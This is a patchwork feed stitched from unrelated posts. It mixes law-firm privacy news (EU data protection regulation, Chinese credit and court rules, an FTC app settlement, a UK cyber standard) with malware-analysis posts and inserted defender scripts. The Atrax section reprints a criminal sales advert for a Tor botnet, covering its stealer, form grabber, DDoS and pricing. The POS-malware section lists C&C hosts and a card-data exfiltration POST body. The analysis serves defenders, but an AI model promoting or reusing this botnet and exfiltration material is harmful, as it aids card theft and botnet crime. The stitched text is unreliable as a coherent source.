As we previously reported, on October 21, 2013, the European Parliament approved its Compromise Text of the proposed EU General Data Protection Regulation (the “Proposed Regulation”). Hunton & Williams has now published an analysis of these proposals.

This latest analysis is the last installment in our series of Executive Briefings on the Proposed Regulation. Since the publication of the Proposed Regulation in January 2012, Hunton & Williams has been tracking developments and analyzing each stage of the legislative process:

  • Our initial Executive Briefing Paper examines the European Commission’s proposals, how the proposals would revise the existing EU data protection framework, and how those changes would likely impact organizations in practice.
  • In January 2013, following the publication of the draft report on the Proposed Regulation of the European Parliament’s lead rapporteur, we published an update to the Executive Briefing Paper, analyzing the rapporteur’s draft amendments to the European Commission’s proposals.
  • In June 2013, we published a second update to the Executive Briefing Paper examining in detail the Irish Presidency’s proposed amendments to the Proposed Regulation; specifically, the Presidency’s proposals regarding consent, legitimate grounds for processing, pseudonymization, data minimization, profiling and the right to be forgotten.
  • Our latest analysis, the final update in the series, examines the European Parliament’s Final Compromise Text, adopted on October 21, 2013.

Next up, the Council of Ministers must reach an agreement on the Proposed Regulation, after which a “trilogue” between the Parliament, the Council and the Commission will be established to work on the final text. A vote is expected before the parliamentary elections in May 2014. The coming months are likely to involve a period of intense negotiations, and businesses should remain engaged in the process.

Hunton & Williams is developing additional materials regarding the next steps in the legislative process to offer practical insights to our clients.

People’s Bank of China Issues Administrative Measures for Credit Reference Agencies

On November 15, 2013, the People’s Bank of China (the “PBOC”) issued its Administrative Measures for Credit Reference Agencies (the “Measures”) – eight months after the Administrative Regulations on the Credit Information Collection Sector (the “Regulations”) became effective on March 15, 2013. The Measures, which will take effect on December 20, 2013, were formulated to enhance the supervision and regulation of credit reference agencies and to promote positive developments in the credit information services sector.

The Measures are intended to complement the Regulations, which established a series of rules for the collection, use, processing, disclosure and transfer of personal information by credit reference agencies. The Measures provide more detail, by clarifying and specifying rules for the establishment of credit reference agencies that deal with the personal credit information of individuals (“personal credit reference agencies”). The Measures require a personal credit reference agency to first apply for pre-approval for a License for Personal Credit Reference Business from the PBOC before the agency may incorporate. In contrast, credit reference agencies that deal with enterprises’ credit information may be incorporated first, and then file with the relevant local PBOC counterpart. The Measures also require the personal credit reference agency to comply with a set of technical information security standards with respect to their credit reference business, and undergo regular assessments by a third-party institution that is qualified to assess information security safeguards.

Also pursuant to the Measures, a credit reference agency may be subject to enhanced surveillance by the PBOC (or its local counterpart) under certain circumstances, such as when the agency (1) is involved in a serious data breach incident, (2) shows signs of a possible data leakage, (3) is having major financial difficulties, (4) has been the subject of numerous complaints, or (5) has failed to comply with its reporting and appraisal obligations.

The implementation of these detailed rules for establishing and running personal credit reference agencies (and other compliance requirements) offers yet another example of the Chinese government’s increased attention to personal information protection issues.

Read our previous coverage on Chinese personal information protection issues, including our post on the Supreme People’s Court of China’s passing of the Provisions on the Online Issuance of Judgment Documents by People’s Courts.

FTC Announces Seminars on Mobile Device Tracking, Predictive Scoring and Consumer-Generated Health Data

On December 2, 2013, the Federal Trade Commission announced that it will host a series of seminars to examine the privacy implications of three new areas of technology used to track, market to and analyze consumers: mobile device tracking, predictive scoring and consumer-generated health data. The seminars will address (1) businesses tracking consumers using signals from the consumers’ mobile devices, (2) the use of predictive scoring to determine consumers’ access to products and offers, and (3) consumer-generated information provided to non-HIPAA covered websites and apps. The FTC stated that the intention of the seminars is to bring attention to new trends in big data and their impact on consumer privacy.

In 2011, Senator Chuck Schumer (D-NY) urged companies to obtain opt-in consent from consumers before engaging in mobile device tracking and asked the FTC to examine the issue. In March 2013, Senator Al Franken (D-MN) asked one tracking company to explain how it collects and uses data from consumers. The FTC’s seminar will address the potential benefits of mobile device tracking to consumers, whether mobile device tracking is anonymous, and how companies can implement privacy by design, including notifying consumers and allowing them to choose whether or not to be tracked.

The seminar on predictive scoring will focus on the uses of predictive scores, ranging from identity verification and fraud prevention to marketing and advertising. The panel will discuss questions such as the accuracy of the scores and the underlying data used to create them, the privacy concerns surrounding the use of the scores and what consumer protections should be provided.

The seminar on consumer-generated health data will examine the types of websites, products and services consumers are using to generate and control their health data, the actions companies are taking to protect consumers’ privacy and security and whether advertising networks impose restrictions on tracking health data.

The Mobile Device Tracking seminar will be held on February 19, 2014 and the Alternative Scoring Products seminar will be held on March 19, 2014. The date of the Consumer Generated and Controlled Health Data seminar has not been announced. The FTC has invited comment from the public on the proposed topics, and will issue staff reports following the sessions.

Interview with Jens ‘Atom’ Steube, ScriptAlert1 with Thomas MacKenzie & Ryan Dewhurst – Episode 355, Part 1 – December 5, 2013

Before Jens 'Atom' Steube wrote hashcat, he was a bug hunter for fun, focusing on open source software. After 2005 he only did bug hunting on commercial software and was therefore not allowed to disclose product names. In 2010 he started hashcat, and since that time it has been the only project he has been working on.

Thomas MacKenzie works for NCC Group as a Security Consultant, conducting all different types of security assessments. Ryan Dewhurst works for NCC Group as a Security Consultant, conducting all different types of security assessments. ScriptAlert1.com is a very simple and concise platform to explain Cross-Site Scripting, its dangers and mitigation. Our aim is for penetration testers to include a link in their pen test reports to the resource and to get it to be the de facto description for semi-technical/tech savvy managers.

China’s Supreme People’s Court Releases Provisions on the Online Issuance of Judgment Documents by People’s Courts

On November 21, 2013, the Supreme People’s Court of China passed the Provisions on the Online Issuance of Judgment Documents by People’s Courts (the “Provisions”), which will take effect on January 1, 2014. The Provisions replace earlier rules (of the same title) enacted by the Supreme People’s Court on November 8, 2010, and generally focus on improved implementation of the principles of standardizing the online issuance of judgment documents, promoting judicial justice and enhancing the public credibility of the judiciary.

The Provisions also contain a number of suggestions for the protection of personal information. These recommendations indicate that:

  • Judgment documents involving state secrets, personal private matters or cases involving juvenile delinquency shall not be published on the Internet.
  • When issuing online judgment documents, a People’s Court shall delete the following information: (1) the home address, contact information, ID number, bank account number and any other personal information of a natural person; (2) relevant information of a juvenile; (3) the bank account number of an entity or other organizations; (4) business secrets; and (5) other content inappropriate for release on the Internet.
  • A People’s Court shall retain the real information of the name or title of the party concerned upon issuing online judgment documents, but the names of the following parties or litigants shall be processed anonymously through the use of alternate symbols: (1) the parties and their statutory agents in marriage and family cases or inheritance disputes; (2) victims and their statutory agents, witnesses and expert witnesses in criminal cases; (3) any defendant who is sentenced to fixed-term imprisonment of not more than three years and is exempted from criminal punishment (and who is not a recidivist or habitual offender).

The Provisions are intended to make the judicial system more independent and more transparent. At the same time, it remains to be seen how easily searchable the judgment opinion network will be after the Provisions are implemented. The Provisions represent the latest step in the ever-growing array of sector-specific regulations governing personal information in China, and may suggest that legislative and regulatory activities for the protection of personal information will continue.

FTC Settles Charges with Flashlight Mobile App Developer

On December 5, 2013, the Federal Trade Commission announced a proposed settlement with mobile app developer Goldenshores Technologies, LLC (“Goldenshores”) following allegations that Goldenshores’ privacy policy for its popular Brightest Flashlight Free app deceived consumers regarding how the app collects information, including geolocation information, and how that information may be shared with third parties. Brightest Flashlight Free, developed for the Android operating system, allows its users to use their cell phones as flashlights.

The FTC’s complaint states that the privacy policy and end user license agreement for the Brightest Flashlight Free app “does not disclose or adequately disclose to consumers that the Brightest Flashlight App transmits or allows the transmission of device data, including precise geolocation along with persistent device identifiers, to third parties, including advertising networks.”

The proposed settlement agreement and consent order bars Goldenshores from misrepresenting how the Brightest Flashlight Free app collects, uses or discloses information, and the extent to which users may exercise control over such use or disclosure. The proposed settlement also requires Goldenshores to obtain “affirmative express consent” from users prior to transmitting geolocation information from the Brightest Flashlight Free app and to “clearly and prominently” indicate to users: (1) that the Brightest Flashlight Free app collects or transmits geolocation information; (2) how geolocation information may be used; (3) why the app accesses geolocation information; and (4) the third parties that receive geolocation information directly or indirectly from the app. Finally, the proposed settlement requires Goldenshores to delete any personal information it has previously collected via the Brightest Flashlight Free app.

In announcing the settlement, Jessica Rich, Director of the FTC’s Bureau of Consumer Protection, commented that the Brightest Flashlight Free app left consumers “in the dark about how their information was going to be used.”

The settlement is open for public comment until January 6, 2014.

Read the FTC Business Center Blog’s post about the Goldenshores settlement.

Update: On April 9, 2014, the FTC approved the final settlement order with Goldenshores.

New UK Cybersecurity Standard in the Works

On November 28, 2013, the UK government published a paper in response to its March 2013 consultation on cybersecurity standards (“Response Paper”), and announced that it will create a new cybersecurity standard. The original consultation concluded in October 2013.

UK Consultation
The consultation focused primarily on assessing the suitability of existing cybersecurity standards (such as the IASME standards and the ISO 27000-series standards) for use by businesses and government agencies. The consultation sought input from businesses, standards bodies, law firms and other interested parties. The consultation concluded that no existing standard is suitable because all of the existing standards have perceived weaknesses, including complexity, high costs and implementation difficulties.

Government Response Paper
The Response Paper explains that the UK government will now work with cybersecurity industry representatives to develop a new standard to serve as the government’s preferred cybersecurity standard. This new standard will be largely based upon key ISO 27000-series standards and will focus on basic cyber hygiene. It is intended to be a “significant improvement” over existing standards, and will provide a simple framework that can be implemented by small and medium enterprises. At this stage, it is not clear what requirements the new standard will include, or whether it will appeal to larger businesses.

According to the Response Paper, the UK government aims to publish the new standard by early 2014. Once implemented, the new standard will enable businesses that conform to the standard to publish a “badge” on their websites and in their promotional materials, indicating that they have achieved a certain level of cybersecurity. It remains to be seen whether there will be significant interest in adopting this standard outside of government departments.

View the UK government’s existing cybersecurity guidance.

Win32/Atrax.A

Atrax is a Tor botnet; you can read about it in the excellent post by Aleksandr.
Someone on kernelmode.info recently posted a fresh sample:
MD5: 44a6a7d4a039f7cc2db6e85601f6d8c1

Also, a fun thing: the coder left a message:
"Nice blog post ESET 2013/07/24 Greetz to KernelMode.info"

Atrax advertising:
Programming language: C (No C++!)
OS: Win XP - 8.1 (all x86/x64)
Admin rights required: No
Special: Tor Integration, spawns no process -> x64/x86 Process injection, this is the first public bot which supports windows 8!
File size: ~1,2 MB (because of Tor integration and x64/x86 Code), you can get a free assembler web downloader ~2KB

Why Tor?
The bot communicates only via Tor with your panel. With Tor you can get a really nice anonymous Botnet. It is almost impossible (well, theoretically it is possible, but Silkroad is still online, so don’t worry) to get your server ip and put your server down. You get a Tor onion domain and this domain cannot be blacklisted (lasts “forever”). So to sum up: If you don’t make any configuration mistakes, your botnet will probably last very long.
You need a VPS or a dedicated server to host this tor botnet, because you need to set up a hidden service. Because of tor the botnet is consuming more hardware resources than typical botnets. Probably it is not possible to get a 10 Dollar/year VPS and try to host over 1k victims.

Setting up hidden service instructions:
- https://www.torproject.org/docs/tor-hidden-service.html.en
- http://kendildonic.wordpress.com/2011/08/03/build-a-tor-hidden-service-onion-web-site-with-a-cheap-vps/
- A little manual to set it up on debian based linux systems is included

The bot consist of a core and various plugins/addons. Each plugin/addon costs some money. Every plugin also communicates over tor.
(If somebody is interested in developing a plugin -> contact me)

Some basic features:
- Autostart, Persistence
- x86/x64 Code, x86/x64 Injection with Heavens Gate technique
- Anti-Analyzer (Protection against e.g. anubis.iseclab.org, malwr.com)
- If you need: Anti-VM (Please request it explicitly)
- Anti-Debug/Anti-Hook Engine
- Doesn't use suspicious windows apis like GetProcAddress/GetModuleHandle
- Plugins are saved to disk with AES-128-CBC encryption (random key)
- Communication over tor is already encrypted, so no extra communication encryption
- Every Plugin and the core is watermarked. Leak -> No updates/support. (All updates are free)
- Everything UNICODE

Panel:
- http://www0.xup.in/exec/ximg.php?fid=11907674
- http://www0.xup.in/exec/ximg.php?fid=68935688
- http://www0.xup.in/exec/ximg.php?fid=20127007
- http://pixs.ru/showimage/2ci7png_4898170_9693543.png
- http://pixs.ru/showimage/ekahjpg_4965220_9693535.jpg
- Login Bruteforce protection, panel will be locked after x failed logins (captchas are not secure)
- SQL-Injection proof
- No IonCube

Standard Features:
- Kill
- Update
- Download (over Tor), Execute (Commandline-Parameter allowed)
- Download (over Tor), Execute (Commandline-Parameter allowed) in memory (Your file doesn't need to be FUD)
- Install Plugin
- Installation List (A list with all installed applications)

The Core has only a few functions, but they are already pretty useful. Yes you can e.g. start your own uncrypted Bitcoin Miner with the "Download over Tor, Execute Memory" function.
I will give you a plain bitcoin miner exe or just use the binaries you can find in this board.

A bot addon is integrated in the main EXE, so no extra file.
A bot plugin is not integrated, you will receive extra file(s).

Addon - DDOS:
- Full IPv6 + IPv4 support.
- UDP Flood
- TCP Flood
- TCP Connect Flood (Some idiots call this "SYN-Flood")
- HTTP Slowloris (based on http://ckers.org/slowloris/)
- HTTP RUDY (R-U-Dead-Yet, based on https://code.google.com/p/r-u-dead-yet/)
- HTTP File Download (Good if your target hosts a file >1MB)
- If you need some more methods, contact me.

Addon - Form Grabber:
- Firefox, Internet Explorer x86/x64, Chrome SSL HTTP POST Grabber
- Anti-Hook Engine (Removes hooks from other bots)
- Own Hook Engine (No copy/paste crap)
- Tested with Browser: Internet Explorer v7/v9/v10, Firefox v11/v21/v22/v24, Chrome v27/v30
- Tested with Website: PayPal, Amazon, Bitcoin.de, Mt. Gox, eBay, Googlemail, vBulletin Boards
- SPDY v3 support
- IE 7/8/9/10 (Enhanced) Protected Mode Support
- Grabs only important POST Form Requests.
- Searches automatically for Username/Password/Email and CC (Possible CC will be displayed in panel)
- Screenshot: http://www0.xup.in/exec/ximg.php?fid=24471254

Addon - Socks 5 Reverse Socks:
- You need a 2nd VPS/dedicated Server to keep your main C&C server secure!
- Server is a Java application to achieve complete platform independence -> All OS supported!
- Socks 5 with and without authentication
- Controlled via tasks
- You can run different instances of the proxy server for different purposes
- Works on all clients because it is a reverse socks (No SSH crap!)
- Panel screenshot: http://www0.xup.in/exec/ximg.php?fid=15537396

Plugin - Stealer:
- Steals all current browser versions.
- Steals: CHROME, FIREFOX, SAFARI, INTERNET EXPLORER, OPERA, FILEZILLA, PIDGIN, JDOWNLOADER v1 + v2, GIGATRIBE, THUNDERBIRD, WINDOWSKEY, FLASHFXP, ICQ, MSN, WINDOWS LIVE, OUTLOOK, PALTALK, STEAM Username Only, TRILLIAN, MINECRAFT, DYNDNS, SMARTFTP, WSFTP, Bitcoin Wallet (Armory, Bitcoin-Qt, Electrum, Multibit)
- If you need something more -> ask me.
- Special: JDownloader v1/v2, Bitcoin Wallet Stealer (whole wallet.dat will be uploaded), IE10 + IE11 support!

Plugin - Coin Mining (Experimental)
- Bitcoin / Litecoin Miner
- Hash Rate displayed in panel
- Based on Ufasoft Miner v0.68 (updated regularly)
- Mining with tasks http://www0.xup.in/exec/ximg.php?fid=60729560

Price:
Core: $250 (Launch price! Read information below)
Addon DDOS: $90
Addon Form Grabber: $300
Addon Reverse Socks: $400
Plugin Stealer: $110
Plugin Coin Mining: $140 (Experimental)

Payment only with Bitcoin. Market price from https://www.bitcoin.de "Current Bitcoin price" - 10%, because of high exchange rate fluctuations!
Bugfix Updates and Support is free of course.
Please keep in mind: This Core Price will be higher soon. This Bot is currently in beta stage, so probably there are still some bugs. Get it now pay less + maybe bugs, wait: pay more and bot is stable

- Builder available?
No, your tor domain will last forever if you don't lose the RSA key.

- Is the bot bin FUD?
No, you need a crypter. This bot should work with all crypters, but .NET Crypters are special. Tell me what .NET crypter you want to use and we will see.
I can give you a free .NET Crypter to get you started!

- The bot is too expensive, noob!
I don't care if you think it is too expensive.

- The filesize sucks, noob!
I don't care.

Alright, let's have a look at the C&C of the sample posted on kernelmode.
estrgnejb7sjly7p.onion >> 46.183.219.xxx
The httpd is not properly configured to serve requests on the IP directly,
so let's have a look from Tor.
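The post leaves a defender with exactly two concrete indicators for this sample: the MD5 above and the hidden-service name of the panel. The following script is an added example, not code from the original post or from the Atrax author, showing how to hunt for both in a file-hash inventory and in DNS/proxy logs. The log format, the inventory and the host names other than the C&C are constructed for the example, and `md5_of_file` is a hypothetical helper for building a real inventory. Note the caveat in `scan_log`: a Tor-integrated bot resolves `.onion` names inside its embedded Tor client, so a `.onion` lookup appearing in corporate DNS or proxy logs indicates a leak or misconfiguration rather than normal bot traffic; the hash match is the more direct indicator.

```python
"""Defender-side hunt for the two indicators the post gives for this Atrax
sample: the file MD5 and the C&C hidden-service name. Log lines and the
file inventory below are constructed for this example."""
from __future__ import annotations

import hashlib
import re
from typing import Iterable

# Indicators from the post: the sample's MD5 and its .onion C&C.
KNOWN_MD5 = {"44a6a7d4a039f7cc2db6e85601f6d8c1"}
KNOWN_ONION = {"estrgnejb7sjly7p.onion"}

# Hidden-service names are base32: 16 chars (v2, as here) or 56 chars (v3).
ONION_RE = re.compile(r"\b(?:[a-z2-7]{16}|[a-z2-7]{56})\.onion\b")


def onion_names(text: str) -> set[str]:
    """Return every syntactically valid .onion name found in a log line."""
    return {m.group(0) for m in ONION_RE.finditer(text.lower())}


def scan_log(lines: Iterable[str]) -> list[dict]:
    """Flag log lines that mention a .onion name.

    A Tor-integrated bot resolves .onion names inside its embedded Tor
    client, so a .onion name reaching corporate DNS or a proxy points to a
    leak or misconfiguration rather than normal bot traffic; it still costs
    nothing to check, and the C&C name from the post is marked explicitly."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        for name in sorted(onion_names(line)):
            hits.append({"line": lineno, "onion": name,
                         "known_c2": name in KNOWN_ONION})
    return hits


def match_hashes(inventory: dict[str, str]) -> list[str]:
    """Return paths whose collected MD5 (any case) matches the sample hash."""
    return [path for path, digest in inventory.items()
            if digest.lower() in KNOWN_MD5]


def md5_of_file(path: str) -> str:
    """Hypothetical helper: hash a file on disk in chunks to build a real inventory."""
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


# Constructed sample data (not real telemetry).
SAMPLE_LOG = [
    "2013-12-13T10:01:02Z dns 10.0.0.21 A www.example.com",
    "2013-12-13T10:01:09Z dns 10.0.0.21 A estrgnejb7sjly7p.onion",
    "2013-12-13T10:02:44Z proxy 10.0.0.35 CONNECT abcdefghijklmnop.onion:80",
    "2013-12-13T10:03:00Z dns 10.0.0.21 A tooshort.onion",
]
SAMPLE_INVENTORY = {
    r"C:\Users\victim\AppData\Roaming\svc.exe": "44A6A7D4A039F7CC2DB6E85601F6D8C1",
    r"C:\Windows\System32\notepad.exe": "0123456789abcdef0123456789abcdef",
}

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
    print("hash matches:", match_hashes(SAMPLE_INVENTORY))
```

Run as-is it reports the two `.onion` lookups (only the first marked as the known C&C) and the one inventory entry whose hash matches; swap `SAMPLE_INVENTORY` for output of `md5_of_file` over a real file list to use it on a host.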

Panel screenshots (images not included in this copy): Login; Statistics; Plugin statistics; Spreader statistic; Bots; Bot legend; Bot information; AtraxStealer plugin logs; Formgrabber plugin logs; Formgrabber plugin logs detail; Plugins; Tasks; Create a new task; Task setting for 'Download & Execute'; Task execution; Edit a task; Settings.

Law360 Features Lisa Sotto in Female Powerbrokers Series

On December 5, 2013, Lisa J. Sotto, partner and head of the Global Privacy and Cybersecurity practice at Hunton & Williams LLP, was featured in Law360’s “Female Powerbrokers” Q&A series. The series focuses on female lawyers and their personal experiences as they have grown into leadership positions within their respective firms. Here is an excerpt from Sotto’s interview:

Q: How did you break into what many consider to be an old boys’ network? 

A: For me, the trick was choosing niche areas that were not well established. I started as an environmental lawyer in 1987, and while it was not a new field at the time, it certainly was not a deeply established men’s club. And then, transitioning into privacy law — a field that was absolutely untrodden at the time — meant that there was no “old boy’s network.” So for both of these areas, I didn’t have to break in. I will say that, early in my career, I walked into many conference rooms in which I was the only female. But I was stunned just a couple of weeks ago to spend two hours in a conference room in which I was the only woman out of 15 people — that hadn’t happened to me in years!

Read the full Q&A feature.

EU – Public consultation on the review of the EU copyright rules

The European Commission has launched a public consultation on the review of the EU copyright rules. All stakeholders are welcome to contribute to this consultation. Contributions are particularly sought from consumers, users, authors, performers, publishers, producers, broadcasters, intermediaries, distributors and other service providers, Collective Management Organisations, public authorities and Member States.

Open data and German coalition agreement – a step forward

The new German coalition agreement, all 185 pages of it, is available online. It is currently being voted on by SPD members. It includes a number of references to open data which constitute a step forward in the degree of visibility and political commitment at federal level in Germany:
  • Public sector data – p. 153

    The first open data projects in Germany demonstrate the potential of open data. The Federal administration with all its agencies must be a pioneer, on the basis of a law, for the provision of open data in standardized machine-readable formats and under free licence conditions. We want to provide an open data portal for federal, state and local governments. The coalition seeks to achieve Germany's accession to the international Open Government Partnership initiative.

  • Scientific information – p. 134

    We will develop a comprehensive open access strategy that improves the general conditions for an effective and permanent access to publicly funded publications and also to data (open data).

  • Transport data – p. 44

    Our goal is a sustainable mobility culture and a user-friendly network of different modes of transport. We encourage multi-modal data platforms on an open-data basis containing information on mobility services, congestion, delays and schedule data. With the networking of transport information and ticketing systems people can be provided with innovative digital mobility services.

  • Bundestag proceedings – p. 152

    We want to expand digital coverage of the Bundestag and its meetings and of committee meetings and public hearings (e.g. by streaming). As soon as possible we will provide publications such as printed materials and minutes in open-data compatible formats under free licence conditions.

Win32/Spy.POSCardStealer.O and unknown POS Sniffer

Finally some new stuff (hmm, no)
Let's talk about Win32/Spy.POSCardStealer.O identified by ESET.
It's pretty lame but let's see it anyway.

In the first procedure the malware registers a registry key in HKLM with 'HDebugger':

And starts to search for track 2:

Then it calls the C&C (hoqou.su/forum.php):
• dns: 1 ›› ip: 62.173.149.140 - adresse: HOQOU.SU

Sleeps for 120000 ms (2 minutes):

And goes back into the track 2 search procedure.
When finally something is found, the malware takes the PID of the program, the process name and the memory address:
Then it sends them to the C&C...

POST req example:
%5BPID%201224%20%28MSR.exe%29%5D%0D%0A%20ADDR%20000B2F90%3A%20%224111111111111111%3D13071010000000000666%22%0D%0A%5BEOF%5D%0D%0A
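To make such a body readable during an incident without decoding it by hand, here is an added Python example (not code from the original post): it URL-decodes the body format shown above (`[PID n (process)]`, ` ADDR xxxxxxxx: "track2"`, `[EOF]`), splits the Track 2 string into its fields (PAN, YYMM expiry, service code, discretionary data), Luhn-checks the PAN and masks it before anything is logged. The sample body is constructed from the post's own example, which uses the 4111111111111111 test number; the field names and the Track 2 layout assumed here follow ISO/IEC 7813.

```python
import re
from urllib.parse import unquote

# Constructed sample: the POST body format shown in the post, using the
# well-known 4111111111111111 test number (not a real card).
SAMPLE_BODY = (
    "%5BPID%201224%20%28MSR.exe%29%5D%0D%0A%20ADDR%20000B2F90%3A%20"
    "%224111111111111111%3D13071010000000000666%22%0D%0A%5BEOF%5D%0D%0A"
)

# Decoded-line shapes, as observed in the example body.
HEADER_RE = re.compile(r"^\[PID (?P<pid>\d+) \((?P<proc>[^)]+)\)\]$")
ADDR_RE = re.compile(r'^\s*ADDR\s+(?P<addr>[0-9A-Fa-f]+):\s*"(?P<track>[^"]*)"$')

# Track 2 (ISO/IEC 7813): PAN '=' YYMM expiry, 3-digit service code, discretionary data.
TRACK2_RE = re.compile(
    r"^(?P<pan>\d{13,19})=(?P<yy>\d{2})(?P<mm>\d{2})(?P<svc>\d{3})(?P<disc>\d*)$"
)


def luhn_ok(digits: str) -> bool:
    """Standard Luhn mod-10 check over a string of decimal digits."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(pan: str) -> str:
    """Keep the first 6 and last 4 digits, so reports never carry a full PAN."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def parse_exfil_body(body: str) -> list:
    """Decode one exfiltration POST body into per-process records."""
    lines = unquote(body).split("\r\n")
    records = []
    current = None
    for line in lines:
        if line == "":
            continue
        if line == "[EOF]":
            break
        m = HEADER_RE.match(line)
        if m:
            current = {"pid": int(m["pid"]), "process": m["proc"], "hits": []}
            records.append(current)
            continue
        m = ADDR_RE.match(line)
        if m and current is not None:
            t = TRACK2_RE.match(m["track"])
            hit = {"addr": m["addr"].upper(), "valid_track2": bool(t)}
            if t:
                hit.update(
                    pan_masked=mask_pan(t["pan"]),
                    luhn_ok=luhn_ok(t["pan"]),
                    expiry="20" + t["yy"] + "-" + t["mm"],
                    service_code=t["svc"],
                )
            current["hits"].append(hit)
    return records


if __name__ == "__main__":
    for rec in parse_exfil_body(SAMPLE_BODY):
        print(rec)
```

The parser stops at `[EOF]`, tolerates several `ADDR` lines under one `[PID ...]` header, and flags strings that sit in the address slot but do not parse as Track 2 (`valid_track2: False`), which is worth keeping in the report because scrapers also pick up false positives from process memory.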

This malware can't receive orders and doesn't have any special mechanism.
In another sample, I've found another domain: rolex216.8s.nl/go/go.php
• dns: 1 ›› ip: 41.223.53.155 - adresse: ROLEX216.8S.NL

This malware was downloaded by a downloader that now downloads another malware that brute-forces WordPress sites (maybe I will talk about this one soon).

Still on POS malware, a 'new' threat (detected only with generic signatures) appeared.
https://www.virustotal.com/fr/file/746cb8cf77b0b00f14c424731948d8fc13378978d193d75f944b12c25e98e0e2/analysis/1376958328/
I have had this sample since August, from a guy who found it on his POS systems.
After 3 months there is still no one who has made an accurate signature.

At first it creates two directories, 'System\Hidden', inside %APPDATA%\Microsoft\Windows

Does a directory test to know from where the executable is launched:

Copies the EXE and launches the copy:

A registry key "Svchost-Windows-Redquired" is created for persistence:

Enters a procedure to remove the original file:
/c del C:\DOCUME~1\ADMINI~1\Bureau\svchost.exe >> NUL
And as expected, sends an exit code just after...

So what does the fresh copy inside the 'good' folder do?
First, it takes the jump because of the directory test.

In the procedure it computes a string based on GetSystemFileTime, then starts to enumerate processes.
It opens them one by one, reads the memory and looks for track 2 in a subroutine.
Usual stuff.
They search by pattern on the second part of track 2: '=13', '=14', '=15', etc.

A file 'Sys.dll' is created, timestamped with an encoded value, and written to:

Sleeps for 450000 ms (7 1/2 minutes)

If a dump is found, the dump is encoded:
And written to Sys.dll.

Then they are sent one by one to the C&C:

http://mcsup.cc/8edf4bc26f9c526ff846c9068f387dac/?update=daily&random=563245325050324532495458495358
http://mcsup.cc/8edf4bc26f9c526ff846c9068f387dac/redirect.php
http://mcsup.cc/8edf4bc26f9c526ff846c9068f387dac/website.php
5.9.96.235
The md5 hash '8edf4bc26f9c526ff846c9068f387dac' is the MD5 of 'zabeat'.
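As an added example (not from the original post), the indicators named across both samples above, the C&C hostnames and IPs, the 'HDebugger' and "Svchost-Windows-Redquired" registry names, the `\Microsoft\Windows\System\Hidden\` path and the mcsup.cc URL path component, are collected into a small Python matcher and run over constructed proxy-log and registry-export lines. The log layout, the Run-key locations and the file paths in the sample lines are assumptions made for the illustration; only the indicators themselves come from the post.

```python
import re

# Indicators taken from the post above (both samples).
IOCS = {
    "domain": ["hoqou.su", "rolex216.8s.nl", "mcsup.cc"],
    "ip": ["62.173.149.140", "41.223.53.155", "5.9.96.235"],
    "registry_value": ["HDebugger", "Svchost-Windows-Redquired"],
    "path_fragment": ["\\microsoft\\windows\\system\\hidden\\"],
    "url_path": ["/8edf4bc26f9c526ff846c9068f387dac/"],
}

# Constructed sample lines (proxy log and registry export). The log layout,
# the Run-key locations and the full file paths are assumptions for this example.
SAMPLE_LINES = [
    "2013-12-10 10:14:02 POS-07 10.0.5.21 POST http://hoqou.su/forum.php 200 312",
    "2013-12-10 10:16:02 POS-07 10.0.5.21 GET http://www.example.com/index.html 200 5120",
    "2013-12-10 11:02:51 POS-12 10.0.5.33 GET http://mcsup.cc/8edf4bc26f9c526ff846c9068f387dac/redirect.php 200 90",
    "2013-12-10 11:03:00 POS-12 10.0.5.33 CONNECT 5.9.96.235:80 - -",
    "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\HDebugger = C:\\Windows\\hdbg.exe",
    "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Svchost-Windows-Redquired = "
    "C:\\Users\\pos\\AppData\\Roaming\\Microsoft\\Windows\\System\\Hidden\\svchost.exe",
    "2013-12-10 11:05:00 POS-12 file created "
    "C:\\Users\\pos\\AppData\\Roaming\\Microsoft\\Windows\\System\\Hidden\\Sys.dll",
]


def _pattern(category: str, ioc: str) -> re.Pattern:
    """Build a matcher whose boundary rules fit the indicator type."""
    esc = re.escape(ioc)
    if category == "domain":
        # Subdomains (www.mcsup.cc) match; a longer label (notmcsup.cc) does not.
        return re.compile(r"(?<![\w-])" + esc + r"(?![\w-])", re.I)
    if category == "ip":
        # Exact dotted quad: reject 15.9.96.235, 1.5.9.96.235 and 5.9.96.235.1.
        return re.compile(r"(?<![\d.])" + esc + r"(?!\.?\d)")
    if category == "registry_value":
        return re.compile(r"(?<![\w-])" + esc + r"(?![\w-])", re.I)
    # Path fragments and URL paths: plain case-insensitive substring.
    return re.compile(esc, re.I)


COMPILED = [(cat, ioc, _pattern(cat, ioc)) for cat, iocs in IOCS.items() for ioc in iocs]


def match_iocs(lines) -> list:
    """Return (line_number, category, indicator) for every indicator found."""
    hits = []
    for n, line in enumerate(lines, 1):
        for cat, ioc, pat in COMPILED:
            if pat.search(line):
                hits.append((n, cat, ioc))
    return hits


if __name__ == "__main__":
    for n, cat, ioc in match_iocs(SAMPLE_LINES):
        print(f"line {n}: {cat} {ioc}")
```

Matching rules differ per indicator type on purpose: a hostname should also fire on its subdomains, an IP must not fire inside a longer dotted string, and the registry names are matched case-insensitively because Windows value names are. The URL path component (the 'zabeat' MD5 directory) is a useful indicator on its own, since the C&C host may change while the panel path does not.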